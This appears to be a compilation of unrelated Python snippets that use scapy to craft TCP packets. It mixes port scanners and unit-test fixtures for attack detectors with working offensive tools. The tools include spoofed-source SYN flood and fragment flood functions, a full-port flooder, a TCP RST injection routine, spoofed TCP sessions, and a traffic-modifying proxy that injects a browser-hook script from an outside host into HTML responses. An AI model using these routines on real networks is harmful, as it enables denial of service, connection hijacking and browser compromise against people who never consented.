def close(self): if not self.sock: return try: # fin tcp = scapy.TCP(dport=self.dport, sport=self.sport, seq=self.wseq, flags='F') r = self.sock.sr1( scapy.IP(dst=self.dst) / tcp, verbose=self.verbose, ) self.wseq = r[scapy.TCP].ack # ack tcp = scapy.TCP( dport=self.dport, sport=self.sport, flags='A', seq=self.wseq, ack=r[scapy.TCP].seq + 1, ) self.sock.send(scapy.IP(dst=self.dst) / tcp) self.rseq = r[scapy.TCP].seq finally: try: self.sock.close() except: pass self.sock = None
def tcpConnectScan(self): for port in self.ports: # Iterates through each port self.checkIfTargetOnline() # Checks if target is online # Uses a random port instead of always using same port when transmitting packets localSourcePort = random.randint(1, 10000) # Sends a singular TCP packet with the SYN Flag to the current port and stores response in variable tcpConnectScanResponse = sc.sr1( sc.IP(dst=self.targIp) / sc.TCP(sport=localSourcePort, dport=port, flags="S"), timeout=1, verbose=False) if tcpConnectScanResponse.haslayer( sc.TCP ): # If a response was received then check it's TCP flags flagIndicator = tcpConnectScanResponse[ sc.TCP].flags # TCP flags stored in variable if flagIndicator == "SA": # If SA flag is present, aka SYN-ACK, received then it means port is opened sendReset = sc.sr(sc.IP(dst=self.targIp) / sc.TCP(sport=80, dport=port, flags="AR"), timeout=1, verbose=False) # Dynamically prints new line when an open port is detected, line contains port number and "Open" self.dynamicPrint(port, "Open") elif flagIndicator == "RA": # If RA flag is present, it means that the target is skeptical of conn. continue
def handshake(targetIP, targetPort): #scapy.conf.L3socket=scapy.L3RawSocket seqNum = random.randint(10000, 20000) sport = random.randint(1024, 65535) ipLayer = scapy.IP(src=localIP, dst=targetIP) tcpLayer1 = scapy.TCP(sport=sport, dport=targetPort, flags='S', seq=seqNum) p = scapy.sr1(ipLayer / tcpLayer1) print(p.show()) # Send ACK Packet tcpLayer2 = scapy.TCP(sport=sport, dport=targetPort, flags='A', seq=seqNum + 1, ack=p.seq + 1) scapy.send(ipLayer / tcpLayer2) # Send Payload payload = "hello" #payload = "GET /\n\n" tcpLayer3 = scapy.TCP(sport=sport, dport=targetPort, flags='PA', seq=seqNum + 1, ack=p.seq + 1) p = scapy.sr1(ipLayer / tcpLayer3 / payload) print(p.show())
def escanearPuertos(host): print("\nEscaneando los puertos de la IP:", host) try: for puerto in listaPuertos: puertoOrigen = scapy.RandShort( ) #para que el paquete enviado tenga un puerto distinto cada vez paquete = scapy.IP(dst=host) / scapy.TCP( sport=puertoOrigen, dport=puerto, flags="S") respuesta = scapy.sr1(paquete, timeout=2) if ("NoneType" in str(type(respuesta))): pass elif (respuesta.haslayer(scapy.TCP) and respuesta.getlayer(scapy.TCP).flags == 0x12): p = scapy.IP(dst=host) / scapy.TCP( sport=puertoOrigen, dport=puerto, flags="R") rst = scapy.sr( p, timeout=1 ) #envío con flag RST activa para cortar la conexión try: servicio = scapy.socket.getservbyport( puerto) # obtiene info del puerto(si es conocido) except: servicio = "¿?" print("[ABIERTO]", puerto, " -> ", servicio) sendPackage( host, puerto, 2000 ) # si existe un puerto abierto, se envían paquetes para "denegar" el servicio except KeyboardInterrupt: print("Abortado por usuario")
def scanTCPPort(ip, port_dict, queue): while True: dst_port = queue.get() src_port = scapy.RandShort() packet = scapy.IP(dst=ip)/scapy.TCP(sport=src_port, dport=dst_port, flags="S") response = scapy.sr1(packet, verbose=False, timeout=5) if response is None: port_dict[dst_port]="Closed" elif(response.haslayer(scapy.TCP)): # If the packet returned had the SYN and ACK flags if(response.getlayer(scapy.TCP).flags == 0x12): # Send TCP packet back to host with ACK and RST flags packet = scapy.IP(dst=ip)/scapy.TCP(sport=src_port,dport=dst_port,flags=0x14) send_rst = scapy.sr(packet, verbose=False, timeout=5) port_dict[dst_port]="Open" # If the packet returned had the RST and ACK flags elif (response.getlayer(scapy.TCP).flags == 0x14): port_dict[dst_port]="Closed" else: port_dict[dst_port]="Closed" queue.task_done()
def simple_tcp_packet(pktlen=100, dl_dst='00:01:02:03:04:05', dl_src='00:06:07:08:09:0a', dl_vlan_enable=False, dl_vlan=0, dl_vlan_pcp=0, dl_vlan_cfi=0, ip_src='192.168.0.1', ip_dst='192.168.0.2', ip_tos=0, tcp_sport=1234, tcp_dport=80, ip_ihl=None, ip_options=False): """ Return a simple dataplane TCP packet Supports a few parameters: @param len Length of packet in bytes w/o CRC @param dl_dst Destinatino MAC @param dl_src Source MAC @param dl_vlan_enable True if the packet is with vlan, False otherwise @param dl_vlan VLAN ID @param dl_vlan_pcp VLAN priority @param ip_src IP source @param ip_dst IP destination @param ip_tos IP ToS @param tcp_dport TCP destination port @param ip_sport TCP source port Generates a simple TCP request. Users shouldn't assume anything about this packet other than that it is a valid ethernet/IP/TCP frame. """ if MINSIZE > pktlen: pktlen = MINSIZE # Note Dot1Q.id is really CFI if (dl_vlan_enable): pkt = scapy.Ether(dst=dl_dst, src=dl_src)/ \ scapy.Dot1Q(prio=dl_vlan_pcp, id=dl_vlan_cfi, vlan=dl_vlan)/ \ scapy.IP(src=ip_src, dst=ip_dst, tos=ip_tos, ihl=ip_ihl)/ \ scapy.TCP(sport=tcp_sport, dport=tcp_dport) else: if not ip_options: pkt = scapy.Ether(dst=dl_dst, src=dl_src)/ \ scapy.IP(src=ip_src, dst=ip_dst, tos=ip_tos, ihl=ip_ihl)/ \ scapy.TCP(sport=tcp_sport, dport=tcp_dport) else: pkt = scapy.Ether(dst=dl_dst, src=dl_src)/ \ scapy.IP(src=ip_src, dst=ip_dst, tos=ip_tos, ihl=ip_ihl, options=ip_options)/ \ scapy.TCP(sport=tcp_sport, dport=tcp_dport) pkt = pkt / ("D" * (pktlen - len(pkt))) #print pkt.show() #print scapy.Ether(str(pkt)).show() return pkt
def test_classify_ddos(self, mock_time): """ Test classify_ddos. """ # Case 1: Classify as SISP mock_time.return_value = 10 pkt = scapy.IP(src="192.168.0.1") \ / scapy.TCP(dport=80) self.ddos.classify_ddos(pkt) l = len(self.ddos.sisp) self.assertEqual(l, 1) temp_dict = {"count": 1, "ports": [80], "start_time": 10} self.assertTrue(self.ddos.sisp.get("192.168.0.1")) self.assertEqual(temp_dict, self.ddos.sisp["192.168.0.1"]) # Check if count increments by 1 self.ddos.classify_ddos(pkt) self.assertEqual(self.ddos.sisp["192.168.0.1"]["count"], 2) # Case2: Classify as SIMP pkt = scapy.IP(src="192.168.0.1") \ / scapy.TCP(dport=90) self.ddos.classify_ddos(pkt) # IP entry should get deleted from SISP dict l = len(self.ddos.sisp) self.assertEqual(l, 0) l2 = len(self.ddos.simp) self.assertEqual(l2, 1) temp_dict = {"count": 3, "ports": [80, 90], "start_time": 10} self.assertTrue(self.ddos.simp.get("192.168.0.1")) self.assertEqual(self.ddos.simp["192.168.0.1"], temp_dict)
def process_packet(packet): scapy_packet = scapy.IP(packet.get_payload()) if scapy_packet.haslayer(scapy.Raw): load = scapy_packet[scapy.Raw].load if scapy_packet[scapy.TCP()].dport == 10000: print("[+] Request") load = re.sub("Accept-Encoding:.*?\\r\\n", "", load) load = load.replace("HTTP/1.1", "HTTP/1.0") print(new_packet.show()) elif scapy_packet[scapy.TCP()].sport == 10000: print("[+] Response") #print(scapy_packet.show()) injection_code = '<script src = "http://10.20.14.213:3000/hook.js"></script>' load = load.replace("</body>", injection_code + "</body>") content_length_search = re.search("(?:conetent-Length:\s)(\d*)", load) if content_length_search and "text/html" in load: content_length = content_length_search.group(0) new_content_length = int(content_length) + len(injection_code) load = load.replace(content_length, str(new_content_length)) if load != scapy_packet[scapy.Raw].load: new_packet = set_load(scapy_packet, load) packet.set_payload(str(new_packet)) packet.accept()
def tcpStealthScan(self): for port in self.ports: # Iterates through each port self.checkIfTargetOnline() # Checks if target is online # Uses a random port instead of always using same port when transmitting packets localSourcePort = random.randint(1, 10000) # Sends a singular TCP packet with the SYN Flag to the current port and stores response in variable tcpStealthScanResponse = sc.sr1( sc.IP(dst=self.targIp) / sc.TCP(sport=localSourcePort, dport=port, flags="S"), timeout=1, verbose=False) if tcpStealthScanResponse.haslayer( sc.TCP ): # If a response was received then check it's TCP flags flagIndicator = tcpStealthScanResponse[ sc.TCP].flags # TCP flags stored in variable if flagIndicator == "SA": # If SA flag is present, aka SYN-ACK, received then it means port is opened sendReset = sc.sr(sc.IP(dst=self.targIp) / sc.TCP(sport=80, dport=port, flags="AR"), timeout=1, verbose=False) self.dynamicPrint(port, "Open") elif flagIndicator == "RA": # If RA flag is present, it means that the target is skeptical of conn. continue elif tcpStealthScanResponse.haslayer( scli.ICMP ): # If packet has an ICMP layer, it may mean port's filtered # If the packet contains these codes in the ICMP layer that indicate if the port is filtered filterList = [1, 2, 3, 9, 10, 13] # If the packet type is type 3 AND it contains one of the above codes then it means the port is filtered if tcpStealthScanResponse[ sc.ICMP].type == 3 and tcpStealthScanResponse[ sc.ICMP].code in filterList: self.dynamicPrint(port, "Filtered") continue
def test_check_tcp_flag(self): """ Test check_tcp_flag. """ pkt = scapy.TCP(flags=None) result = self.pf1.check_tcp_flag(pkt) self.assertEqual(result, 0) pkt = scapy.TCP(flags="S") result = self.pf1.check_tcp_flag(pkt) self.assertEqual(result, 1)
def test_check_network_congestion(self): """ Test check_network_congestion. """ pkt = scapy.TCP(flags="EC") result = self.pf1.check_network_congestion(pkt) self.assertEqual(result, 0) pkt = scapy.TCP(flags="S") result = self.pf1.check_network_congestion(pkt) self.assertEqual(result, 1)
def test_check_fin_ack(self): """ Test check_fin_ack. """ pkt = scapy.TCP(flags="FA") result = self.pf1.check_fin_ack(pkt) self.assertEqual(result, 1) pkt = scapy.TCP(flags="F") result = self.pf1.check_fin_ack(pkt) self.assertEqual(result, 0)
def setUp(self): """ Setup class for SynFlood. """ # Packet with SYN flag self.pkt1 = scapy.IP(src="192.168.0.1") \ / scapy.TCP(flags="S") # Packet with ACK flag (handshake completed) self.pkt2 = scapy.IP(src="192.168.0.1") \ / scapy.TCP(flags="A") # Create SynFlood object self.syn_flood = SynFlood()
def get_rstpkt(pkt): fake_pkt = None if (pkt.ipv4): fake_pkt = sp.IP(dst=pkt.src_addr, src=pkt.dst_addr) / sp.TCP( dport=pkt.src_port, sport=pkt.dst_port) else: fake_pkt = sp.IPv6(dst=pkt.src_addr, src=pkt.dst_addr) / sp.TCP( dport=pkt.src_port, sport=pkt.dst_port) fake_pkt[sp.TCP].flags = 'AR' fake_pkt[sp.TCP].ack = pkt.tcp.seq_num + 1 fake_pkt[sp.TCP].seq = pkt.tcp.ack_num + 1 fake_pkt[sp.TCP].window = 0 return fake_pkt
def spoofTCPPacket(oSrcAdapter, sSrcIP, sTargetIP, iDPort, dPacket): # SYN sport = random.randint(1024, 65535) ip = scapy.IP(src=sSrcIP, dst=sTargetIP) SYN = scapy.TCP(sport=sport, dport=iDPort, flags='S', seq=1000) SYNACK = scapy.sr1(ip / SYN, timeout=iTIMEOUT) if SYNACK is None: return SYNACK ## No SYN/ACK back, ARP Spoofing problem or port not open # ACK ACK = scapy.TCP(sport=sport, dport=iDPort, flags='A', seq=SYNACK.ack, ack=SYNACK.seq + 1) scapy.send(ip / ACK) # TCP DATA scapy.conf.verb = 0 oIP = scapy.IP(src=sSrcIP, dst=sTargetIP) oTCP = scapy.TCP(sport=sport, dport=iDPort, flags='PA', seq=SYNACK.ack, ack=SYNACK.seq + 1) oRAW = scapy.Raw(load=dPacket) oResp = scapy.sr1(oIP / oTCP / oRAW, timeout=iTIMEOUT) # FIN FINACK = None if not oResp is None: FIN = scapy.TCP(sport=sport, dport=iDPort, flags='FA', seq=oResp.ack, ack=oResp.seq + 1) FINACK = scapy.sr1(ip / FIN, timeout=iTIMEOUT) if not FINACK is None: LASTACK = scapy.TCP(sport=sport, dport=iDPort, flags='A', seq=FINACK.ack, ack=FINACK.seq + 1) scapy.send(ip / LASTACK) # RST #RST=scapy.TCP(sport=sport, dport=iDPort, flags='R', seq=SYNACK.ack, ack=SYNACK.seq + 1) #scapy.send(ip/RST) return oResp
def setUp(self): """ Setup class for BGP_Abuse. """ # Create scapy packet (valid attack) self.pkt = scapy.IP(src="10.0.2.15", dst="200.10.10.1") \ / scapy.TCP(dport=53, sport=179, flags="RA", seq=123, ack=456) # Create a scapy packet (invalid attack) self.pkt2 = scapy.IP(src="10.0.2.15", dst="200.10.10.1") \ / scapy.TCP(dport=53, sport=179, seq=123, ack=456) # Create BGP Abuse object self.bgp_abuse_obj = BGP_Abuse()
def scan(ip, website): arp_request = scapy.ARP(pdst=ip) broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") arp_request_broadcast = broadcast / arp_request answered_list = scapy.srp( arp_request_broadcast, timeout=1, verbose=False )[0] #only getting element 0 (answered list because this function returns 2 things) print('[+] Beginning scan') ans, unans = scapy.sr( scapy.IP(dst=website) / scapy.TCP(sport=666, dport=[80, 440, 441, 442, 443], flags='S'), verbose=False, timeout=3) print('----------------------------------------------------------') print('PORT') ans.make_table(lambda s, r: ( s.dst, s.dport, r.sprintf("{TCP:%TCP.flags%}{ICMP:%IP.src% - %ICMP.type%}"))) print(' ') clients_list = [] for element in answered_list: client_dict = {'IP': element[1].psrc, 'MAC': element[1].hwsrc} clients_list.append(client_dict) return clients_list
def rst_inject(packet): if running: if packet.haslayer(scapy.IP): p = packet[scapy.IP] if packet.haslayer(scapy.TCP): scapy_TCP = packet[scapy.TCP] if scapy_TCP.dport == 80: #paketa nga klienti print("\n[*] Packet accepted at destionation port:" + str(scapy_TCP.dport)) ip_packet = scapy.IP(src=p.dst, dst=p.src, ihl=p.ihl, flags=p.flags, frag=p.frag, ttl=p.ttl, proto=p.proto, id=12345) tcp_packet = scapy.TCP(sport=scapy_TCP.dport, dport=scapy_TCP.sport, seq=scapy_TCP.ack, ack=0, dataofs=scapy_TCP.dataofs, reserved=scapy_TCP.reserved, flags="R", window=scapy_TCP.window, options=scapy_TCP.options) reset = ip_packet / tcp_packet scapy.send(reset, verbose=False) print("[+] RST flag injected") else: e.set()
def dos_syn(host): syn_port = int(input("[#] SYN port: ")) packets = int(input("[#] Send packets: ")) i = 0 while i <= packets: s_port = random.randint(2, 5000) s_eq = random.randint(2, 5000) w_indow = random.randint(2, 5000) #Create random source ip i1 = str(random.randint(1, 254)) i2 = str(random.randint(1, 254)) i3 = str(random.randint(1, 254)) i4 = str(random.randint(1, 254)) d = "." source_ip = i1 + d + i2 + d + i3 + d + i4 #Set random source IP IP_Packet = scapy.IP(src=source_ip, dst=host) TCP_Packet = scapy.TCP(sport=s_port, dport=syn_port, flags="S", seq=s_eq, window=w_indow) scapy.send(IP_Packet / TCP_Packet, verbose=0) #Send packets print(f"{YELLOW}[!] Send SYN packet " + str(i) + f"{RESET}", end="\r") i += 1 print(f"\n{GREEN}[+] ATTACK DONE...{RESET}")
def get_tcp_injection_packet(packet): """ If the given packet is an attempt to access the course website, create a IP+TCP packet that will redirect the user to Facebook by sending them the `RESPONSE` from above. """ if q1.packet_filter(packet): if packet[S.TCP].load.find('GET'): ip = packet.getlayer(S.IP) #packet[S.IP] tcp = packet.getlayer(S.TCP) #packet[S.TCP] # IP layer of the response packet: # Warpping the IP packet with a TCP layer and setting # source port to match the original source port # and destination port to be 80 for HTTP. # Also sets the TCP flags to Acknowldeged and Finish (FA). # Finally we set the sequence number to be the ack number of the packet # and the ack number to be the seq number of the packet + the length of the tcp layer. # Appending the load to the packet return S.IP(dst=ip.src, src=ip.dst) / S.TCP( dport=ip.sport, sport=ip.dport, flags='FA', seq=tcp.ack, ack=tcp.seq + len(tcp.payload)) / S.Raw(load=RESPONSE) return None
def _make_tcp_layer(self, port: int): return scapy.TCP(sport=port, flags='S', options=[ ('Timestamp', (const.TS_INITIAL_VAL, 0)), ('WScale', 0) ]) # /scapy.Raw(load = const.PACKET_RESEARCH_MESSAGE)
def _send_ack(self): ack = self.ip / scapy.TCP(sport=self.src_port, dport=self.dst_port, flags="A", seq=self.seq, ack=self.ack) self.s.send(ack)
def setUp(self): """ Setup class for LandAttack. """ # Create scapy packet (valid attack) self.pkt = scapy.IP(src="192.168.0.1", dst="192.168.0.1") \ / scapy.TCP(sport=80, dport=80) # Create a scapy packet (invalid attack) self.pkt2 = scapy.IP(src="192.168.0.1", dst="192.168.0.6") \ / scapy.TCP(sport=80, dport=90) # Create LandAttack object self.land_attack_obj = LandAttack()
def setup_tx_pipeline(cli, port, spec): setup_mclasses(cli, globals()) SEQNO = 12345 PORT_HTTP = 80 eth = scapy.Ether(src=spec.src_mac, dst=spec.dst_mac) ip = scapy.IP(src=spec.src_ip, dst=spec.dst_ip) tcp = scapy.TCP(sport=spec.src_port, dport=PORT_HTTP, seq=SEQNO) payload_prefix = 'GET /pub/WWW/TheProject.html HTTP/1.1\r\nHost: www.' payload = payload_prefix + 'aaa.com\r\n\r\n' pkt_headers = eth / ip / tcp pkt_template = str(eth / ip / tcp / payload) num_cores = len(spec.tx_cores) flows_per_core = spec.num_flows / num_cores if spec.pps is not None: pps_per_core = spec.pps / num_cores else: pps_per_core = 5e6 return Pipeline([ FlowGen(template=pkt_template, pps=pps_per_core, flow_rate=flows_per_core, flow_duration=5, arrival='uniform', duration='uniform', quick_rampup=False), RandomUpdate(fields=[{'offset': len(pkt_headers) + len(payload_prefix), 'size': 1, 'min': 97, 'max': 122}]), RandomUpdate(fields=[{'offset': len(pkt_headers) + \ len(payload_prefix) + 1, 'size': 1, 'min': 97, 'max': 122}]), IPChecksum() ])
def synFlooder(src, dst, message): for dport in range(1024, 65535): IPlayer = scapy.IP(src=src, dst=dst) TCPlayer = scapy.TCP(sport=4444, dport=dport) RAWlayer = scapy.Raw(load=message) packet = IPlayer / TCPlayer / RAWlayer scapy.send(packet)
def flagfuzzer(self, dst, port): r = { 'R': [], # RST 'RA': [], # RST-ACK 'SA': [], # SYN-ACK '--': [], # no response '??': [] # ICMP error msgs (?) } scanflags = [ '', 'F', 'S', 'FS', 'R', 'RF', 'RS', 'RSF', 'A', 'AF', 'AS', 'ASF', 'AR', 'ARF', 'ARS', 'ARSF' ] for flagval in scanflags: pkt = scapy.IP(dst=dst) pkt /= scapy.TCP(dport=port, sport=scapy.RandNum(1024, 65535), flags=flagval) x = scapy.sr1(pkt, timeout=.5) sys.stderr.write(" %s \r" % flagval) sent = pkt.sprintf("%TCP.flags%") if sent == '': sent = '-' if x is not None: recvd = x.sprintf("%TCP.flags%") #self.r[recvd].append(sent+"."+str(x[scapy.IP].ttl)) r[recvd].append(sent) else: r['--'].append(sent) log.msg("finished") del r['--'] for k in r.keys(): log.msg("%4s: %s" % (k, " ".join(r[k])))
def _syn_scan_thread_helper(self): while True: time.sleep(1) if not self._host_state.is_inspecting(): continue # Build a random list of (ip, port). port_list = get_port_list() ip_list = self._host_state.ip_mac_dict.keys() ip_port_list = list(itertools.product(ip_list, port_list)) random.shuffle(ip_port_list) if len(ip_list) == 0: continue utils.log('[SYN Scanning] Start scanning {} ports over IPs: {}'.format( len(port_list), ', '.join(ip_list) )) for (ip, port) in ip_port_list: time.sleep(0.01) syn_pkt = sc.IP(dst=ip) / \ sc.TCP(dport=port, sport=SYN_SCAN_SOURCE_PORT, flags="S", seq=SYN_SCAN_SEQ_NUM) sc.send(syn_pkt, verbose=0) with self._lock: if not self._active: return
def scan_port(device_ip, port_to_scan): srcport = scapy.RandShort() SYNACK_packet = scapy.sr1(scapy.IP(dst=device_ip) / scapy.TCP(sport=srcport, dport=port_to_scan, flags="S"), timeout=.008) # packet with sync flag if SYNACK_packet is None: # if there are no response return False pkt_flags = SYNACK_packet.getlayer(scapy.TCP).flags # get flag if pkt_flags == SynAck: Rst_packet = scapy.IP(dst=device_ip) / scapy.TCP(sport=srcport, dport=port_to_scan, flags="R") # packet with reset flag scapy.send(Rst_packet) return True else: return False
def Syn_fragment(): clear = os.system('clear') print("**************************************") print(" SYN FragmentAttack") print("**************************************") print("Please input your target's IP") dst_ip = input("[SYN Fragment]#") src_ip = scapy.RandIP() #zidong sheng cheng yuan duankou he mudi duankou src_port = scapy.RandShort() dst_port = scapy.RandShort() packet_number = 0 try: while True: packet = scapy.IP(src=src_ip, dst=dst_ip, flags=[ 0x2000 ], frag=1) / scapy.TCP(dport=80, flags="S") / ("X" * 6000) #packet = scapy.IP(dst=dst_ip,flags=[0x2000],frag=1)/scapy.TCP(dport=80,flags="F")/("X"*6000) scapy.send(packet, verbose=False) packet_number += 1 print("[+]Sent packet is " + str(packet_number)) except KeyboardInterrupt: print("[-]Ctrl + C detected ....")
def flagfuzzer(self, dst, port): r = { 'R': [], # RST 'RA': [], # RST-ACK 'SA': [], # SYN-ACK '--': [], # no response '??': [] # ICMP error msgs (maybe... inspect this manually) } for flagval in self.scanflags: pkt = scapy.IP(dst=dst) pkt /= scapy.TCP(dport=port, sport=scapy.RandNum(1024, 65535), flags=flagval) x = scapy.sr1(pkt, timeout=.5) sys.stderr.write(" %s \r" % flagval) sent = pkt.sprintf("%TCP.flags%") if sent == '': sent = '-' if x is not None: recvd = x.sprintf("%TCP.flags%") #self.r[recvd].append(sent+"."+str(x[scapy.IP].ttl)) r[recvd].append(sent) else: r['--'].append(sent) self.msg("finished") del r['--'] self.msg("%4s: %s" % ('Recv', 'Sent')) for k in r.keys(): self.msg("%4s: %s" % (k, " ".join(r[k])))